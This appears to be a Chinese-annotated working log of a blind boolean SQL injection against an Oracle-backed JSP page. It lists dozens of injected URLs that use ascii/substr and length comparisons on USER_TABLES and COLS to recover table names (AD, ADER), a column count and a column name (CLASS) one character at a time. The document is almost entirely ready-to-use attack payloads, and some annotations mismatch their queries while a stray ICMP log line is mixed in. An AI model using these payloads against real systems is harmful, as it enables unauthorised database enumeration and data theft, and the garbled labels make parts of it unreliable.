www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

以下为判断第一个表的第一位值为:A

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))

以下为判断第一个表AD的第二位值为:D

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

以下为判断第二个表的表ADER的表名长度为:4

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

以下为判断第二个表ADER第一位的值为:A

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))

以下为判断第二个表ADER第二位的值为:D

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

以下为判断第二个表ADER第三位的值为:E

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

以下为判断第二个表ADER第四位的值为:R

www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

以下为判断第三个表的表名长度为:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

3、 猜解列名长度和列名:

a) 以下为猜解字段长度为:2位

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

? 列名长度为:10位以上

以下猜解列名的长度的第一位为:1(十位)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

以下猜解列名长度的第二位为:0(个位)

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

Informational 10/12/ 15:03:25 Suspect event: ICMP Time Exceeded (>1 for 1 seconds)

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

? 以下为猜解第一列的第一个字段名CLASS的长度为:5

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7>nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

? 以下为猜解第一列第一个字段的第一位为:C

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

? 以下为猜解第一列第一个字段的第一位为:L

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

? 以下为猜解第一列第一个字段的第三位为:A

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

